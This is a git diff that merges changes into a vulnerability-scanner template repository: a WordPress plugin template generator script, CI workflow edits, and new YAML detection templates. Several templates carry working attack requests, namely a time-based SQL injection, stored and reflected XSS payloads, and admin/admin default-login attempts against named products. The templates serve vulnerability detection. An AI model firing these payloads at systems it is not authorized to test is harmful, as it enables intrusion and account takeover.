Merge branch 'projectdiscovery:main' into pgsql_detect
commit
a9c2622572
|
@ -19,6 +19,7 @@ from bs4 import BeautifulSoup
|
|||
import requests
|
||||
import re
|
||||
from markdown import markdown
|
||||
import os
|
||||
from termcolor import colored, cprint
|
||||
|
||||
# Regex to extract the name of th plugin from the URL
|
||||
|
@ -123,8 +124,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
|
||||
|
||||
|
@ -159,14 +159,25 @@ requests:
|
|||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
'''
|
||||
version_file = open(
|
||||
f"helpers/wordpress/plugins/{name}.txt", "w")
|
||||
|
||||
work_dir = os.getcwd()
|
||||
print(f"Current working directory: {work_dir}")
|
||||
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
|
||||
template_dir = f"{work_dir}/technologies/wordpress/plugins"
|
||||
|
||||
if not os.path.exists(helper_dir):
|
||||
os.makedirs(helper_dir)
|
||||
|
||||
if not os.path.exists(template_dir):
|
||||
os.makedirs(template_dir)
|
||||
|
||||
helper_path = f"helpers/wordpress/plugins/{name}.txt"
|
||||
version_file = open(helper_path, "w")
|
||||
version_file.write(version)
|
||||
version_file.close()
|
||||
|
||||
# print(template)
|
||||
template_file = open(
|
||||
f"technologies/wordpress/plugins/{name}.yaml", "w")
|
||||
template_path = f"technologies/wordpress/plugins/{name}.yaml"
|
||||
template_file = open(template_path, "w") # Dev environment
|
||||
template_file.write(template)
|
||||
template_file.close()
|
||||
|
||||
|
|
|
@ -7,9 +7,6 @@ jobs:
|
|||
Update:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Install tree
|
||||
run: sudo apt-get install tree -y
|
||||
|
||||
- name: Check out repository code
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
|
@ -25,20 +22,22 @@ jobs:
|
|||
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
|
||||
|
||||
- name: Update Templates
|
||||
id: update-templates
|
||||
run: |
|
||||
python3 .github/scripts/wordpress-plugins-update.py
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:" -a
|
||||
git add --all
|
||||
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
|
||||
|
||||
- name: Push changes
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.TOKEN }}
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
||||
|
|
230
.new-additions
230
.new-additions
|
@ -1,230 +0,0 @@
|
|||
cves/2021/CVE-2021-30128.yaml
|
||||
cves/2021/CVE-2021-42887.yaml
|
||||
cves/2022/CVE-2022-0786.yaml
|
||||
cves/2022/CVE-2022-25082.yaml
|
||||
cves/2022/CVE-2022-33891.yaml
|
||||
cves/2022/CVE-2022-45362.yaml
|
||||
default-logins/mobotix/mobotix-default-login.yaml
|
||||
default-logins/tiny-file-manager-default-login.yaml
|
||||
exposed-panels/content-central-login.yaml
|
||||
exposed-panels/creatio-login-panel.yaml
|
||||
exposed-panels/loxone-panel.yaml
|
||||
exposed-panels/ncentral-panel.yaml
|
||||
exposed-panels/posthog-admin-panel.yaml
|
||||
exposed-panels/webuzo-admin-panel.yaml
|
||||
exposed-panels/xfinity-panel.yaml
|
||||
exposures/logs/ws-ftp-log.yaml
|
||||
exposures/tokens/zenserp/zenscrape-api-key.yaml
|
||||
exposures/tokens/zenserp/zenserp-api-key.yaml
|
||||
exposures/tokens/zeplin/zeplin-access-token.yaml
|
||||
exposures/tokens/zerobounce/zerobounce-api-token.yaml
|
||||
iot/carel-plantvisor-panel.yaml
|
||||
iot/hue-personal-wireless-panel.yaml
|
||||
miscellaneous/gpc-json.yaml
|
||||
misconfiguration/sony-bravia-disclosure.yaml
|
||||
network/exposed-dockerd.yaml
|
||||
technologies/akamai-cache-detect.yaml
|
||||
technologies/aws/amazon-ec2-detect.yaml
|
||||
technologies/wordpress/plugins/ad-inserter.yaml
|
||||
technologies/wordpress/plugins/add-to-any.yaml
|
||||
technologies/wordpress/plugins/admin-menu-editor.yaml
|
||||
technologies/wordpress/plugins/adminimize.yaml
|
||||
technologies/wordpress/plugins/advanced-custom-fields.yaml
|
||||
technologies/wordpress/plugins/akismet.yaml
|
||||
technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
|
||||
technologies/wordpress/plugins/all-in-one-seo-pack.yaml
|
||||
technologies/wordpress/plugins/all-in-one-wp-migration.yaml
|
||||
technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
|
||||
technologies/wordpress/plugins/amp.yaml
|
||||
technologies/wordpress/plugins/antispam-bee.yaml
|
||||
technologies/wordpress/plugins/astra-sites.yaml
|
||||
technologies/wordpress/plugins/astra-widgets.yaml
|
||||
technologies/wordpress/plugins/autoptimize.yaml
|
||||
technologies/wordpress/plugins/backwpup.yaml
|
||||
technologies/wordpress/plugins/better-search-replace.yaml
|
||||
technologies/wordpress/plugins/better-wp-security.yaml
|
||||
technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
|
||||
technologies/wordpress/plugins/breadcrumb-navxt.yaml
|
||||
technologies/wordpress/plugins/broken-link-checker.yaml
|
||||
technologies/wordpress/plugins/child-theme-configurator.yaml
|
||||
technologies/wordpress/plugins/classic-editor.yaml
|
||||
technologies/wordpress/plugins/classic-widgets.yaml
|
||||
technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
|
||||
technologies/wordpress/plugins/cloudflare.yaml
|
||||
technologies/wordpress/plugins/cmb2.yaml
|
||||
technologies/wordpress/plugins/coblocks.yaml
|
||||
technologies/wordpress/plugins/code-snippets.yaml
|
||||
technologies/wordpress/plugins/coming-soon.yaml
|
||||
technologies/wordpress/plugins/complianz-gdpr.yaml
|
||||
technologies/wordpress/plugins/contact-form-7-honeypot.yaml
|
||||
technologies/wordpress/plugins/contact-form-7.yaml
|
||||
technologies/wordpress/plugins/contact-form-cfdb7.yaml
|
||||
technologies/wordpress/plugins/cookie-law-info.yaml
|
||||
technologies/wordpress/plugins/cookie-notice.yaml
|
||||
technologies/wordpress/plugins/creame-whatsapp-me.yaml
|
||||
technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
|
||||
technologies/wordpress/plugins/custom-css-js.yaml
|
||||
technologies/wordpress/plugins/custom-fonts.yaml
|
||||
technologies/wordpress/plugins/custom-post-type-ui.yaml
|
||||
technologies/wordpress/plugins/disable-comments.yaml
|
||||
technologies/wordpress/plugins/disable-gutenberg.yaml
|
||||
technologies/wordpress/plugins/duplicate-page.yaml
|
||||
technologies/wordpress/plugins/duplicate-post.yaml
|
||||
technologies/wordpress/plugins/duplicator.yaml
|
||||
technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
|
||||
technologies/wordpress/plugins/easy-fancybox.yaml
|
||||
technologies/wordpress/plugins/easy-google-fonts.yaml
|
||||
technologies/wordpress/plugins/easy-table-of-contents.yaml
|
||||
technologies/wordpress/plugins/easy-wp-smtp.yaml
|
||||
technologies/wordpress/plugins/elementor.yaml
|
||||
technologies/wordpress/plugins/elementskit-lite.yaml
|
||||
technologies/wordpress/plugins/enable-media-replace.yaml
|
||||
technologies/wordpress/plugins/envato-elements.yaml
|
||||
technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
|
||||
technologies/wordpress/plugins/ewww-image-optimizer.yaml
|
||||
technologies/wordpress/plugins/facebook-for-woocommerce.yaml
|
||||
technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
|
||||
technologies/wordpress/plugins/flamingo.yaml
|
||||
technologies/wordpress/plugins/fluentform.yaml
|
||||
technologies/wordpress/plugins/font-awesome.yaml
|
||||
technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
|
||||
technologies/wordpress/plugins/formidable.yaml
|
||||
technologies/wordpress/plugins/forminator.yaml
|
||||
technologies/wordpress/plugins/ga-google-analytics.yaml
|
||||
technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
|
||||
technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
|
||||
technologies/wordpress/plugins/google-listings-and-ads.yaml
|
||||
technologies/wordpress/plugins/google-site-kit.yaml
|
||||
technologies/wordpress/plugins/google-sitemap-generator.yaml
|
||||
technologies/wordpress/plugins/gtranslate.yaml
|
||||
technologies/wordpress/plugins/gutenberg.yaml
|
||||
technologies/wordpress/plugins/happy-elementor-addons.yaml
|
||||
technologies/wordpress/plugins/header-and-footer-scripts.yaml
|
||||
technologies/wordpress/plugins/header-footer-code-manager.yaml
|
||||
technologies/wordpress/plugins/header-footer-elementor.yaml
|
||||
technologies/wordpress/plugins/header-footer.yaml
|
||||
technologies/wordpress/plugins/health-check.yaml
|
||||
technologies/wordpress/plugins/hello-dolly.yaml
|
||||
technologies/wordpress/plugins/imagify.yaml
|
||||
technologies/wordpress/plugins/imsanity.yaml
|
||||
technologies/wordpress/plugins/insert-headers-and-footers.yaml
|
||||
technologies/wordpress/plugins/instagram-feed.yaml
|
||||
technologies/wordpress/plugins/intuitive-custom-post-order.yaml
|
||||
technologies/wordpress/plugins/iwp-client.yaml
|
||||
technologies/wordpress/plugins/jetpack.yaml
|
||||
technologies/wordpress/plugins/kadence-blocks.yaml
|
||||
technologies/wordpress/plugins/kirki.yaml
|
||||
technologies/wordpress/plugins/leadin.yaml
|
||||
technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
|
||||
technologies/wordpress/plugins/limit-login-attempts.yaml
|
||||
technologies/wordpress/plugins/litespeed-cache.yaml
|
||||
technologies/wordpress/plugins/loco-translate.yaml
|
||||
technologies/wordpress/plugins/loginizer.yaml
|
||||
technologies/wordpress/plugins/loginpress.yaml
|
||||
technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
|
||||
technologies/wordpress/plugins/mailchimp-for-wp.yaml
|
||||
technologies/wordpress/plugins/mailpoet.yaml
|
||||
technologies/wordpress/plugins/maintenance.yaml
|
||||
technologies/wordpress/plugins/mainwp-child.yaml
|
||||
technologies/wordpress/plugins/malcare-security.yaml
|
||||
technologies/wordpress/plugins/megamenu.yaml
|
||||
technologies/wordpress/plugins/members.yaml
|
||||
technologies/wordpress/plugins/meta-box.yaml
|
||||
technologies/wordpress/plugins/ml-slider.yaml
|
||||
technologies/wordpress/plugins/newsletter.yaml
|
||||
technologies/wordpress/plugins/nextend-facebook-connect.yaml
|
||||
technologies/wordpress/plugins/nextgen-gallery.yaml
|
||||
technologies/wordpress/plugins/ninja-forms.yaml
|
||||
technologies/wordpress/plugins/ocean-extra.yaml
|
||||
technologies/wordpress/plugins/official-facebook-pixel.yaml
|
||||
technologies/wordpress/plugins/one-click-demo-import.yaml
|
||||
technologies/wordpress/plugins/optinmonster.yaml
|
||||
technologies/wordpress/plugins/password-protected.yaml
|
||||
technologies/wordpress/plugins/pdf-embedder.yaml
|
||||
technologies/wordpress/plugins/photo-gallery.yaml
|
||||
technologies/wordpress/plugins/php-compatibility-checker.yaml
|
||||
technologies/wordpress/plugins/pixelyoursite.yaml
|
||||
technologies/wordpress/plugins/polylang.yaml
|
||||
technologies/wordpress/plugins/popup-builder.yaml
|
||||
technologies/wordpress/plugins/popup-maker.yaml
|
||||
technologies/wordpress/plugins/post-smtp.yaml
|
||||
technologies/wordpress/plugins/post-types-order.yaml
|
||||
technologies/wordpress/plugins/premium-addons-for-elementor.yaml
|
||||
technologies/wordpress/plugins/pretty-link.yaml
|
||||
technologies/wordpress/plugins/really-simple-captcha.yaml
|
||||
technologies/wordpress/plugins/really-simple-ssl.yaml
|
||||
technologies/wordpress/plugins/redirection.yaml
|
||||
technologies/wordpress/plugins/redux-framework.yaml
|
||||
technologies/wordpress/plugins/regenerate-thumbnails.yaml
|
||||
technologies/wordpress/plugins/safe-svg.yaml
|
||||
technologies/wordpress/plugins/seo-by-rank-math.yaml
|
||||
technologies/wordpress/plugins/sg-cachepress.yaml
|
||||
technologies/wordpress/plugins/sg-security.yaml
|
||||
technologies/wordpress/plugins/shortcodes-ultimate.yaml
|
||||
technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
|
||||
technologies/wordpress/plugins/simple-custom-post-order.yaml
|
||||
technologies/wordpress/plugins/simple-page-ordering.yaml
|
||||
technologies/wordpress/plugins/siteguard.yaml
|
||||
technologies/wordpress/plugins/siteorigin-panels.yaml
|
||||
technologies/wordpress/plugins/smart-slider-3.yaml
|
||||
technologies/wordpress/plugins/so-widgets-bundle.yaml
|
||||
technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml
|
||||
technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
|
||||
technologies/wordpress/plugins/sucuri-scanner.yaml
|
||||
technologies/wordpress/plugins/svg-support.yaml
|
||||
technologies/wordpress/plugins/table-of-contents-plus.yaml
|
||||
technologies/wordpress/plugins/tablepress.yaml
|
||||
technologies/wordpress/plugins/taxonomy-terms-order.yaml
|
||||
technologies/wordpress/plugins/the-events-calendar.yaml
|
||||
technologies/wordpress/plugins/themeisle-companion.yaml
|
||||
technologies/wordpress/plugins/tinymce-advanced.yaml
|
||||
technologies/wordpress/plugins/translatepress-multilingual.yaml
|
||||
technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
|
||||
technologies/wordpress/plugins/under-construction-page.yaml
|
||||
technologies/wordpress/plugins/unyson.yaml
|
||||
technologies/wordpress/plugins/updraftplus.yaml
|
||||
technologies/wordpress/plugins/use-any-font.yaml
|
||||
technologies/wordpress/plugins/user-role-editor.yaml
|
||||
technologies/wordpress/plugins/velvet-blues-update-urls.yaml
|
||||
technologies/wordpress/plugins/w3-total-cache.yaml
|
||||
technologies/wordpress/plugins/webp-converter-for-media.yaml
|
||||
technologies/wordpress/plugins/widget-importer-exporter.yaml
|
||||
technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
|
||||
technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
|
||||
technologies/wordpress/plugins/woo-variation-swatches.yaml
|
||||
technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
|
||||
technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
|
||||
technologies/wordpress/plugins/woocommerce-payments.yaml
|
||||
technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
|
||||
technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
|
||||
technologies/wordpress/plugins/woocommerce-services.yaml
|
||||
technologies/wordpress/plugins/woocommerce.yaml
|
||||
technologies/wordpress/plugins/woosidebars.yaml
|
||||
technologies/wordpress/plugins/wordfence.yaml
|
||||
technologies/wordpress/plugins/wordpress-importer.yaml
|
||||
technologies/wordpress/plugins/wordpress-seo.yaml
|
||||
technologies/wordpress/plugins/worker.yaml
|
||||
technologies/wordpress/plugins/wp-fastest-cache.yaml
|
||||
technologies/wordpress/plugins/wp-file-manager.yaml
|
||||
technologies/wordpress/plugins/wp-google-maps.yaml
|
||||
technologies/wordpress/plugins/wp-mail-smtp.yaml
|
||||
technologies/wordpress/plugins/wp-maintenance-mode.yaml
|
||||
technologies/wordpress/plugins/wp-migrate-db.yaml
|
||||
technologies/wordpress/plugins/wp-multibyte-patch.yaml
|
||||
technologies/wordpress/plugins/wp-optimize.yaml
|
||||
technologies/wordpress/plugins/wp-pagenavi.yaml
|
||||
technologies/wordpress/plugins/wp-reset.yaml
|
||||
technologies/wordpress/plugins/wp-sitemap-page.yaml
|
||||
technologies/wordpress/plugins/wp-smushit.yaml
|
||||
technologies/wordpress/plugins/wp-statistics.yaml
|
||||
technologies/wordpress/plugins/wp-super-cache.yaml
|
||||
technologies/wordpress/plugins/wp-user-avatar.yaml
|
||||
technologies/wordpress/plugins/wpcf7-recaptcha.yaml
|
||||
technologies/wordpress/plugins/wpcf7-redirect.yaml
|
||||
technologies/wordpress/plugins/wpforms-lite.yaml
|
||||
technologies/wordpress/plugins/wps-hide-login.yaml
|
||||
technologies/wordpress/plugins/yith-woocommerce-compare.yaml
|
||||
technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
|
||||
vulnerabilities/amazon/amazon-ec2-ssrf.yaml
|
||||
vulnerabilities/other/digital-ocean-ssrf.yaml
|
||||
vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml
|
|
@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
|
||||
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
||||
**328 directories, 4791 files**.
|
||||
**335 directories, 5229 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -4,10 +4,11 @@ info:
|
|||
name: OpenTSDB <= 2.4.0 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: "OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory."
|
||||
description: OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.
|
||||
reference:
|
||||
- https://github.com/OpenTSDB/opentsdb/issues/2051
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35476
|
||||
- http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
@ -10,11 +10,12 @@ info:
|
|||
- https://packetstormsecurity.com/files/cve/CVE-2022-23854
|
||||
- https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
|
||||
- https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02
|
||||
classification:
|
||||
cve-id: CVE-2022-23854
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"InTouch Access Anywhere"
|
||||
verified: "true"
|
||||
tags: lfi,packetstorm,cve,cve2022,aveva,intouch
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2022-3768
|
||||
|
||||
info:
|
||||
name: WPSmartContracts < 1.3.12 - Author SQLi
|
||||
author: Hardik-Solanki
|
||||
severity: high
|
||||
description: |
|
||||
The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author
|
||||
remediation: Fixed in version 1.3.12
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-3768
|
||||
- https://cve.report/CVE-2022-3768
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2022-3768
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-smart-contracts,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_2>=5'
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(content_type_2, "text/html")'
|
||||
- 'contains(body_2, "Batch Mint NFTs")'
|
||||
condition: and
|
|
@ -0,0 +1,66 @@
|
|||
id: CVE-2022-4260
|
||||
|
||||
info:
|
||||
name: WP-Ban < 1.69.1 - Admin Stored XSS
|
||||
author: Hardik-Solanki
|
||||
severity: high
|
||||
description: |
|
||||
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
|
||||
remediation: Fixed in version 1.69.1
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260
|
||||
- https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk
|
||||
classification:
|
||||
cve-id: CVE-2022-4260
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: XSS
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_4, "<script>alert(document.domain);</script>")'
|
||||
- 'contains(content_type_4, "text/html")'
|
||||
- 'status_code_4 == 200'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: nonce
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '_wpnonce=([0-9a-z]+)'
|
||||
internal: true
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2022-46381
|
||||
|
||||
info:
|
||||
name: Certain Linear eMerge E3-Series - Cross Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381
|
||||
- https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt
|
||||
metadata:
|
||||
verified: "true"
|
||||
shodan-query: http.html:"Linear eMerge"
|
||||
tags: cve,cve2022,xss,emerge,linear
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/badging/badge_template_v0.php?layout=1&type="/><svg/onload="alert(document.domain)"/>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<svg/onload="alert(document.domain)"/>'
|
||||
- 'Badging Template'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,60 @@
|
|||
id: kanboard-default-login
|
||||
|
||||
info:
|
||||
name: Kanboard Default Login
|
||||
author: shelled
|
||||
severity: high
|
||||
description: Kanboard default login was discovered.
|
||||
reference:
|
||||
- https://twitter.com/0x_rood/status/1607068644634157059
|
||||
- https://github.com/kanboard/kanboard
|
||||
- https://docs.kanboard.org/v1/admin/installation/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:2056442365
|
||||
tags: default-login,kanboard
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /?controller=AuthController&action=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /?controller=AuthController&action=check HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username={{user}}&password={{pass}}&csrf_token={{csrf_token}}
|
||||
|
||||
- |
|
||||
GET /?controller=DashboardController&action=show HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
user:
|
||||
- admin
|
||||
pass:
|
||||
- admin
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf_token
|
||||
part: body
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- "hidden\" name=\"csrf_token\" value=\"([0-9a-z]+)\""
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'New project'
|
||||
- 'Project management'
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,48 @@
|
|||
id: xui-weak-login
|
||||
|
||||
info:
|
||||
name: X-UI Login Default Login
|
||||
author: dali
|
||||
severity: high
|
||||
description: |
|
||||
X-UI Default Login Credentials.
|
||||
reference:
|
||||
- https://github.com/vaxilu/x-ui
|
||||
- https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20.
|
||||
classification:
|
||||
cwe-id: CWE-798
|
||||
metadata:
|
||||
verified: "true"
|
||||
shodan-query: title:"X-UI Login"
|
||||
tags: x-ui,default-login
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/login"
|
||||
headers:
|
||||
content-type: application/x-www-form-urlencoded
|
||||
body: "username={{username}}&password={{password}}"
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- "admin"
|
||||
password:
|
||||
- "admin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"success":true'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: atlantis-detect
|
||||
|
||||
info:
|
||||
name: Atlantis Detect
|
||||
author: jonathanwalker
|
||||
severity: info
|
||||
reference:
|
||||
- https://github.com/runatlantis/atlantis
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:-1706783005
|
||||
tags: panel,atlantis
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'title="atlantis'
|
||||
- 'Lock'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: kanboard-login
|
||||
|
||||
info:
|
||||
name: Kanboard Login Panel
|
||||
author: DhiyaneshDK
|
||||
severity: info
|
||||
description: A Kanboard login panel was detected.
|
||||
classification:
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:2056442365
|
||||
tags: panel,kanboard
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '/?controller=UserAjaxController&action=status'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,20 +0,0 @@
|
|||
id: zeplin-access-token
|
||||
info:
|
||||
name: Zeplin Access Token
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
reference:
|
||||
- https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zeplin/zeplin.go
|
||||
- https://app.zeplin.io/profile/developer
|
||||
tags: exposure,token,zeplin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '([a-zA-Z0-9-.]{350,400})'
|
|
@ -1,21 +0,0 @@
|
|||
id: zerobounce-api-token
|
||||
|
||||
info:
